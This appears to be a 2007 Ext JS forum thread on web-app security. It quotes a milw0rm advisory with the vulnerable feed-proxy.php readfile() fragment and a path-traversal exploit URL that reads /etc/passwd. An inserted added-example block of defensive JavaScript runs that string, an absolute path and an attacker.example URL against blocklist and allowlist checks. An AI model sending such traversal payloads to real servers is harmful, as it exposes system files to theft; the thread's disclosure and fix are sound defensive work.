1. #1 jay@moduscreate.com

    Web app developers, think security !!


    If you have time, please listen to these podcasts!


    http://www.grc.com/securitynow.htm

    http://media.grc.com/sn/SN-085.mp3 -- Intro to code injection on the web
    http://media.grc.com/sn/SN-086.mp3 -- XSS (Cross site scripting)
    http://media.grc.com/sn/SN-087.mp3 -- SQL injection

  2. #2 potdarko

    XSS Attacks


    Thanks for the links. Jeremiah Grossman's book on XSS attacks is almost ready to hit the shelves. Hope RSnake does one too ... speaking of books.. how's the Ext book going? J/K

  3. #3 potdarko

    ext 1.0 alpha1 (feed-proxy.php) Remote File Disclosure


    Posted at www.milw0rm.com:

    Alpha1 has a Remote File Disclosure. (by Alkomandoz Hacker)

    In /examples/layout/feed-proxy.php

    ----------------------------------------------------------

    // fragment as quoted in the advisory; the earlier lines that set $feed
    // from the request are not shown
    header('Content-Type: text/xml');
    readfile($feed);   // $feed reaches readfile() unvalidated: any path or URL
    return;
    }
    ?>

    ----------------------------------------------------------

    # Exploit:[Path_ext]/examples/layout/feed-proxy.php?feed=../../../../../../etc/passwd
    Last edited by potdarko; 25 Apr 2007 at 7:40 AM. Reason: added urls
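    An added example, not code from the post above, the advisory, or the Ext JS project, of how a feed proxy should treat that parameter; it is in JavaScript rather than the PHP of the quoted script. The client sends a short key, the server maps the key to a URL on its own allowlist, and everything else, including the published traversal string, gets a 400. It also shows why a bolted-on "../" blocklist is not a fix. The allowlist contents, the function names and the fake fetch are assumptions made for the example.

```javascript
// Added example (not Ext JS project code). The quoted feed-proxy.php hands the
// raw ?feed= value to readfile(), so a client can read any path the web server's
// user can read. The fix that survives is an allowlist: the client sends a short
// key, the server maps it to a URL it chose itself, anything else is rejected.
// FEEDS, resolveFeed, blocklistAllows, proxyResponse and fakeFetch are hypothetical.

// Hypothetical allowlist: key -> upstream feed URL the proxy is willing to fetch.
const FEEDS = Object.freeze({
  'ext-blog': 'http://extjs.com/blog/feed/',
  'security-now': 'http://www.grc.com/securitynow.htm',
});

// Map an untrusted request parameter to an allowed URL, or null.
function resolveFeed(param) {
  if (typeof param !== 'string') return null;
  // Shape check first: a key is a short token, never a path or a URL.
  if (!/^[a-z0-9-]{1,32}$/.test(param)) return null;
  // Own-property check so "constructor" or "toString" cannot hit the prototype.
  if (!Object.prototype.hasOwnProperty.call(FEEDS, param)) return null;
  return FEEDS[param];
}

// The kind of bolted-on blocklist that is NOT a fix: it catches "../" but lets
// an absolute path or a remote URL straight through.
function blocklistAllows(param) {
  return typeof param === 'string' && param.indexOf('../') === -1;
}

// Proxy handler. fetchFeed is injected so the example runs offline; in a real
// deployment it would perform the outbound HTTP request to the allowed URL.
function proxyResponse(query, fetchFeed) {
  const url = resolveFeed(query.feed);
  if (url === null) {
    return { status: 400, contentType: 'text/plain', body: 'unknown feed' };
  }
  return { status: 200, contentType: 'text/xml', body: fetchFeed(url) };
}

// Constructed stand-in for the upstream fetch (no network access).
function fakeFetch(url) {
  return '<rss><channel><title>feed from ' + url + '</title></channel></rss>';
}

// Walk the advisory's payload and a few variants through both checks.
function demo() {
  const probes = [
    '../../../../../../etc/passwd',  // the published exploit string
    '/etc/passwd',                   // absolute path, no "../" at all
    'http://attacker.example/x.xml', // remote URL; readfile() follows it when allow_url_fopen is on
    'ext-blog',                      // the only kind of value that should work
  ];
  return probes.map((p) => ({
    param: p,
    blocklist: blocklistAllows(p),
    allowlist: resolveFeed(p) !== null,
    status: proxyResponse({ feed: p }, fakeFetch).status,
  }));
}
```

    Running demo() shows the blocklist passing both the absolute path and the remote URL while the allowlist rejects everything except the known key; the proxy never sees a filesystem path at all, because the only string it ever opens comes from its own table.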

  4. #4 jay@moduscreate.com


    yeah, something to think about. good post.

  5. #5 potdarko

    :) he's right


    I hope rezn doesn't mind me quoting him here, but his post @ sla.ckers.org 's forum is... so true.

    I just poked around myself here: [extjs.com] and I have to admit that the examples are really, really, nice. And it makes me happy that you all think forcing users to disable JS is a ridiculous idea, cause having it around sure makes hacking more fun.
    Extjs is loved by all, whatever the reason
    Last edited by potdarko; 30 Apr 2007 at 6:44 PM. Reason: fixed my cat's CRs
    Miguel Benevides

  6. #6 JeffHowden (Sencha - Community Support Team)


    Quote Originally Posted by potdarko View Post
    Posted at www.milw0rm.com:

    Alpha1 has a Remote File Disclosure. (by Alkomandoz Hacker)

    In /examples/layout/feed-proxy.php


    # Exploit:[Path_ext]/examples/layout/feed-proxy.php?feed=../../../../../../etc/passwd
    The server-side scripts provided are offered as a convenience, not as an indicator of how things should be done server-side.
    Jeff Howden
    Ext JS - Support Team Volunteer

  7. #7 Herm


    You can now use the public proxy provided by Google here: http://code.google.com/apis/ajaxfeeds/. They say "The AJAX Feed API lets you download any public Atom or RSS feed using only JavaScript, so you can easily mash up feeds with your content and other APIs."

  8. #8 jay@moduscreate.com


    that's insane.

    It's open to too many things. I mean, they're bypassing the XHR restriction that only allows data to be retrieved from the originating host.

  9. #9 Herm


    You can do cross-site as much as you want with nothing else but Ext.data.ScriptTagProxy.

    Google is safer though, because as a developer you're saying (to the app you wrote and deployed to the client's browser): "hey, get my data from my server and my 3rd-party data from the Google server". As a developer, you're a) protecting your server infrastructure from being exploited and b) protecting your user by not having to send them to 3rd-party sites.